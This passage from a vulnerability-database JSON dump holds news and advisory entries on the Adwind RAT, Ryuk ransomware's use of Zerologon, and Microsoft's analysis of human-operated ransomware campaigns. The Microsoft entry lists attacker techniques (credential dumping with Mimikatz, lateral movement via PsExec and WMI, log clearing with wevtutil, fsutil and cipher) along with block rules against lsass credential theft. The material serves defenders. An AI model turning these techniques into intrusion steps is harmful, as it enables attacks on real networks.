common Java functionality is notoriously difficult to detect or detonate in a sandbox for the simple fact that Java is so common on the web,\u201d researchers with Menlo Security said in a [Tuesday post](<https://www.menlosecurity.com/blog/hiding-in-plain-sight-new-adwind-jrat-variant-uses-normal-java-commands-to-mask-its-behavior?hs_preview=YMFZfJZD-19402234706>). \u201cIn fact, any effort to block or limit Java would result in much of the internet breaking down \u2014 a non-starter for users who increasingly rely on rich web apps or SaaS platforms for their day-to-day responsibilities.\u201d\n\nThe JAR file then decrypts and loads a loader, which then loads an initial set of modules and sends out a request that is responsible for initializing the RAT with the command-and-control (C2) server.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/10/29114503/RAT-Blog.png>)\n\nAdwind is then able to decrypt a configuration file to get a list of C2 server IP addresses. Once an address is selected, an AES-encrypted request is made (via TCP Port 80) to remotely load a set of additional JAR files, researchers said.\n\nOnce downloaded, the JAR files activate the trojan, which becomes fully functional and is able to send a C2 request to access and send credentials from the browser and various Windows applications to a remote server.\n\nThese credentials can include personal bank credentials or business app logins \u2013 basically any password saved in a browser or application running on Windows.\n\nAdwind has been around for a while, but continues to make waves with evolving variants and new targets.\n\nThe trojan was most recently seen in an [August 2019 phishing campaign](<https://threatpost.com/adwind-spyware-as-a-service-attacks-utility-grid-operators/147525/>) that took aim at national grid utilities infrastructure. Adwind, was being used as a a malware-as-a-service model in that campaign, researchers said, with features including the ability to take screenshots, harvest credentials from Chrome, Internet Explorer and Microsoft Edge, record video and audio, take photos, steal files, perform keylogging, read emails and steal VPN certificates.\n\n## Detection Difficult\n\nAdwind has made bypassing and disabling security tools a hallmark. Last year, [a new variant emerged](<https://threatpost.com/adwind-rat-scurries-by-av-software-with-new-dde-variant/137661/>) that used a fresh take on the Dynamic Data Exchange (DDE) code-injection technique for anti-virus evasion.\n\nMost notably, the Adwind trojan is able to mask its behavior by acting like any other Java command, researchers said.\n\n\u201cWithout dynamic construction of the initial JAR file, threat intelligence has very little or no heuristics with which to create a static rule or signature that can effectively detect the initial JAR payload among the millions of Java commands flowing in and out of the corporate network,\u201d said researchers. \u201cIt\u2019s like wading through a crowd of a million people and trying to pick out the one person wearing a green undershirt without being able to look under people\u2019s jackets. There\u2019s nothing suspicious about its existence, its appearance or even its initial behavior. Everything about it seems normal.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-10-29T16:17:02", "type": "threatpost", "title": "New Adwind Variant Targets Windows, Chromium Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2019-10-29T16:17:02", "id": "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "href": "https://threatpost.com/new-adwind-variant-windows-chromium-credentials/149642/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-19T16:58:13", "description": "The Ryuk threat actors have struck again, moving from sending a phishing email to complete encryption across the victim\u2019s network in just five hours.\n\nThat breakneck speed is partially the result of the gang using the Zerologon privilege-escalation bug (CVE-2020-1472), less than two hours after the initial phish, researchers said.\n\nThe Zerologon vulnerability allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services, according to Microsoft. It was patched in August, but many organizations remain vulnerable.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn this particular attack, after the attackers elevated their privileges using Zerologon, they used a variety of commodity tools like Cobalt Strike, AdFind, WMI and PowerShell to accomplish their objective, according to the analysis from researchers at the DFIR Report, [issued Sunday](<https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/>).\n\n## **The Attack Begins**\n\nThe attack started with a phishing email containing a version of the Bazar loader, researchers said. From there, the attackers performed basic mapping of the domain, using built-in Windows utilities such as Nltest. However, they needed to escalate their privileges to do any real damage, so they exploited the recently disclosed Zerologon vulnerability, researchers said.\n\nHaving gained elevated admin privileges, the cybercriminals were able to reset the machine password of the primary domain controller, according to the analysis.\n\nThen, they moved laterally to the secondary domain controller, carrying out more domain discovery via Net and the PowerShell Active Directory module.\n\n\u201cFrom there, the threat actors appeared to use the default named pipe privilege escalation module on the server,\u201d researchers said. \u201cAt this point, the threat actors used [Remote Desktop Protocol] RDP to connect from the secondary domain controller to the first domain controller, using the built-in administrator account.\u201d\n\n## **Cobalt Strike**\n\nLateral movement was initiated via Server Message Block (SMB) and Windows Management Instrumentation (WMI) executions of Cobalt Strike beacons, researchers said. SMB is a networking file-share protocol included in Windows 10 that provides the ability to read and write files to network devices. WMI meanwhile enables management of data and operations on Windows-based operating systems.\n\nCobalt Strike belongs to a group of dual-use tools that are typically leveraged for both exploitation and post-exploitation tasks. Other examples in circulation include PowerShell Empire, Powersploit and Metasploit, according to [recent findings](<https://threatpost.com/fileless-malware-critical-ioc-threats-2020/159422/>) from Cisco.\n\n\u201cFrom memory analysis, we were also able to conclude the actors were using a trial version of Cobalt Strike with the EICAR string present in the network configuration for the beacon. Both portable executable and DLL beacons were used,\u201d researchers added.\n\nOnce on the main domain controller, another Cobalt Strike beacon was dropped and executed.\n\nThe analysis of the attack revealed that after about four hours and 10 minutes, the Ryuk gang pivoted from the primary domain controller, using RDP to connect to backup servers.\n\n\u201cThen more domain reconnaissance was performed using AdFind. Once this completed\u2026the threat actors were ready for their final objective,\u201d according to DFIR\u2019s report.\n\n## **Five Hours Later: Ryuk**\n\nFor the final phase of the attack, the Ryuk operators first deployed their ransomware executable onto backup servers. After that, the malware was dropped on other servers in the environment, and then workstations.\n\nRyuk is a highly active malware, responsible for a string of recent hits, including a high-profile attack that [shut down Universal Health Services](<https://threatpost.com/universal-health-ransomware-hospitals-nationwide/159604/>) (UHS), a Fortune-500 owner of a nationwide network of hospitals.\n\n\u201cThe threat actors finished their objective by executing the ransomware on the primary domain controller, and at the five-hour mark, the attack completed,\u201d researchers said.\n\nThe use of Zerologon made the cybrcriminals\u2019 efforts much easier, since the attack didn\u2019t need to be aimed at a high-privileged user who would likely have more security controls.\n\nIn fact, the toughest part of the campaign was the start of the attack \u2013 the successful installation of Bazar from the initial phishing email, which required user interaction. Researchers note that the user was a Domain User and did not have any other permissions \u2013 but that proved to be a non-issue, thanks to Zerologon.\n\nThe attack shows that organizations need to be ready to move more quickly than ever in response to any detected malicious activity.\n\n\u201cYou need to be ready to act in less than an hour, to make sure you can effectively disrupt the threat actor,\u201d according to researchers.\n\n## **Zerologon Attacks Surge**\n\nThe case study comes as exploitation attempts against Zerologon spike. Government officials [last week warned that](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>) advanced persistent threat actors (APTs) are now leveraging the bug to target elections support systems.\n\nThat came just days after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)). The APT is MERCURY (also known as MuddyWater, Static Kitten and Seedworm). And, [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[In September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **Github. This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\n_ _\n", "cvss3": {}, "published": "2020-10-19T16:36:00", "type": "threatpost", "title": "Ryuk Ransomware Gang Uses Zerologon Bug for Lightning-Fast Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-19T16:36:00", "id": "THREATPOST:870C912F079364DE3A8DADFDBE4E42D1", "href": "https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&amp;CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:49", "description": "Zoho has released a security update on a vulnerability (CVE-2020-10189) affecting ManageEngine Desktop Central build 10.0.473 and below. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine Desktop Central is a unified endpoint management solution that helps companies, including managed service providers (MSPs), to control servers, laptops, smartphones, and tablets from a central location.\n\nThe Cybersecurity and Infrastructure Security Agency encourages users and administrators to review the [Zoho security update](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) for more information and apply the [patch](<https://www.manageengine.com/products/desktop-central/service-packs.html>).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product 